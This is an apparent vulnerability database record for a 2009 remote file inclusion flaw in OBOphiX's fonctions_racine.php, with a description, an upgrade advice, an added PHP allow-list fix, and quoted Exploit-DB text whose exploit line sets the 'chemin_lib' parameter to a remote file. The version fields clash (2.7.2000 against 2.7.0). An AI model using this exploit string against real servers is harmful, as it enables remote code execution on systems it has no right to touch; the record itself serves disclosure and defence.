Vendor: OBOphiX [fonctions_racine.php]
By: EA Ngel
CVSS: 9.3 (HIGH)
Title: Remote File Include Vulnerability
CWE: 98
Product Name: OBOphiX [fonctions_racine.php]
Affected Version From: 2.7.2000
Affected Version To: 2.7.2000
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

OBOphiX [fonctions_racine.php] <= 2.7.0 Remote File Include Vulnerability

A vulnerability exists in OBOphiX [fonctions_racine.php] version 2.7.0 and earlier, which allows a remote attacker to include arbitrary files on the system. The vulnerability is due to the 'chemin_lib' parameter in the 'fonctions_racine.php' script not properly sanitizing user-supplied input. An attacker can exploit this vulnerability to include arbitrary files from remote web servers, which can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

Upgrade to OBOphiX [fonctions_racine.php] version 2.7.1 or later.
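
For installations that cannot upgrade immediately, the include can be pinned to a server-side path. The following is an added example, not OBOphiX code and not the vendor's patch; the function name resolve_lib_file, the allow-list and the demo directory are hypothetical, and it assumes 'chemin_lib' reaches the script from the request.

```php
<?php
// Added example: not OBOphiX source and not the vendor's 2.7.1 patch.
// Pattern quoted in the advisory (shown only as a comment, never executed):
//   require("$chemin_lib/config.inc.php");
// Assumption: $chemin_lib can be set from the request, e.g. with
// register_globals=On, because the script itself never assigns it.

/**
 * Return the real path of an allow-listed include inside a fixed directory.
 * $libDir must come from application code, never from $_GET/$_POST/$_COOKIE.
 */
function resolve_lib_file(string $libDir, string $name): string
{
    $allowed = ['config.inc.php'];          // hypothetical allow-list
    if (!in_array($name, $allowed, true)) {
        throw new RuntimeException('include name not allow-listed');
    }
    // realpath() only resolves local paths: URLs and missing paths give false.
    $base = realpath($libDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('library directory is not a local directory');
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('include resolves outside the library directory');
    }
    return $path;
}

// Constructed demo directory standing in for the application's lib/ folder.
$lib = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lib_demo_' . getmypid();
mkdir($lib);
file_put_contents($lib . '/config.inc.php', "<?php\n\$config_loaded = true;\n");

// First candidate: the fixed server-side path. Second: a constructed
// URL-style value of the kind a request parameter could carry.
foreach ([$lib, 'http://example.invalid/lib'] as $candidate) {
    try {
        require resolve_lib_file($candidate, 'config.inc.php');
        echo "loaded: $candidate\n";
    } catch (RuntimeException $e) {
        echo "rejected: $candidate ({$e->getMessage()})\n";
    }
}

unlink($lib . '/config.inc.php');
rmdir($lib);
```

Keeping allow_url_include=Off in php.ini (the default since PHP 5.2) blocks URL wrappers in include/require as a second layer, but it does not stop inclusion of local files, so the path still has to be fixed in code.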

Exploit-DB raw data:

[*] OBOphiX [fonctions_racine.php] <= 2.7.0 Remote File Include Vulnerability 


[+] Author          : EA Ngel
[+] Location        : Manado - Indonesia
[+] Site            : www[dot]manadocoding[dot]net
[+] Contact         : engelpemula@gmail.com
[+] Download Script : http://biznetnetworks.dl.sourceforge.net/project/obophix/obophix/pack%20complet%20V1.0/lib.V1.zip


[/] Dork            : just find it yourself <= :d


[#] Bug             : require("$chemin_lib/config.inc.php");


[^] 3xpl0it         : http://localhost/[path]/fonctions_racine.php?chemin_lib=[thanks.txt?]

                   
[@] Special Thanks  : str0ke, basix, kamuiclone, Mr.C, cokiki, bl4ck_3n9in3, cyberlog, dbanie, fl3xu5, exnome
                      g4pt3k, tonaas, doniskynet, rezagms, wishnu, my_wishdom, b0b0h0, jeckham, k3nz0, yadiyauri
                      akiko, steve_san, steve_diving, moon_lee, c6, bibeh^pink, missi, luv13, 
                      hyhgao, eyin, key, sansan and all friends


[!] Greetz to0     : cr4wl3r is companions in arms and cpu monitor, keyboard, mouse <= :d
                     
                     | gorontalodefacer[dot]org | sekuritionline[dot]net |


[^] Note            : Never be ashamed to be a beginner

                      GOD BLESS

# milw0rm.com [2009-09-09]